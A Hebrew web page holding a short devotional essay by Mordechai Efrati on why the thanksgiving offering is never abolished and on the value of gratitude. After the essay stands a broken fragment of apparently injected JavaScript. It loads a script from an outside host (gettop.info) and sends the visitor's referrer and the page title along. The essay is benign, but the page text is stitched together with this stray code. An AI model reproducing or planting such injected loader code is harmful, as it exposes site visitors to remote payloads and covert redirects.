“כל הקרבנות בטלין וקרבן תודה אינה בטלה לעולם” . מדוע?

בס”ד
קרבן תודה / מאת מרדכי אפרתי
חז”ל לימדו אותנו שבעתיד “כל הקרבנות בטלין וקרבן תודה אינה בטלה לעולם” . מדוע? מה המיוחד ב”קרבן תודה” ?
כידוע פרט ל “קרבן התודה” הובאו במקדש סוגים שונים של קורבנות.
יש קרבנות שהובאו לשם קיום מצווה, כמו : קרבן “הבכור” (הבהמה הבכורה) “והמעשר” (הקרבת עשירית מכלל הבהמות שיש לאדם) וקרבן “הפסח”.
יש קרבנות שנועדו לשם כפרת עוונות, כמו : קרבן “העולה” (שבא לכפר על מצוות שאין עליהם עונש מלקות או מיתה, ואין מביאים עליהם קורבן או על מחשבות רעות) , “החטאת” (שבא לכפר על עבירה בשגגה) “והאשם” (שמטרתו לכפר על עבירות חמורות ).
יש קרבנות שהציבור (ולא היחיד) מביא אותם כמו: קרבן “התמיד” וקרבן “המוסף” שהם חלק מפניית הציבור לאלוקים כעין תפילה.
האמירה שכל הקרבנות בטלין “וקרבן תודה” אינה בטלה לעולם באה למעשה לומר (לדעת חלק מחכמינו) שכאשר העולם והאדם יהיו מתוקנים ושלימים ויותר ולא יחטאו הם לא יזדקקו לקרבן לשם כפרה אבל “קרבן תודה” שבא כדי להודות על כל הטוב לא ייפסק גם כאשר העולם יגיע לתיקונו כיוון שתמיד צריך להודות על הטוב.
בעומק הדברים אפשר לומר שקרבן “תודה” נבדל מכל הקרבנות , כי הוא מובא ללא כל חיוב חיצוני. הוא מבוסס רק על רצונו הטוב של המקריב, המקדיש את קרבנו מתוך שמחה והכרת הטוב. לעתיד לבוא לא יהיה כל חיוב וכפיה בקיום המצוות כולן, ועבודת ה’ ואמירת “התודה” תיעשה אך ורק מתוך רצון פנימי וחופש גמור .
למעשה אמירת “תודה” מוציאה את האדם מהתחושה שהכל מגיע לו.
יש אנשים שחיים כל הזמן בהרגשה שכולם חייבים להם וכאילו העולם תמיד נמצא ב “יתרת חובה” כלפיהם. כל דבר מגיע להם ולכן הם אינם מכירים בצורך לומר “תודה” לא לאלוקים ולא לאנשים וכדי להטמיע בנו את התובנה שלא הכל מגיע לנו ולא הכל “מובן מאליו” ויש תמיד להודות ,קרבן “תודה” לא תתבטל גם בעתיד.
אפשר לומר עוד שעצם אמירת “תודה” (והבאת קרבן “תודה”) היא בעצם הכרזה שהעולם שאלוקים ברא הוא טוב.
אנו אומרים כל בוקר “מודה אני …. שהחזרת בי נישמתי” ובתפילת “העמידה” אומרים “מודים” כלומר אנו רואים את הטוב ומכירים בזה שהעולם הוא טוב ולכן יש להודות עליו.
אפשר לראות את הרע שבמציאות וכל הזמן להתמרמר אבל אנו מצווים לשים דגש על ראיית הטוב שיש לנו ושקיים בעולם ולהודות לאלוקים עליו “הודו להשם כי טוב”.

} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

סגור לתגובות.

Scroll To Top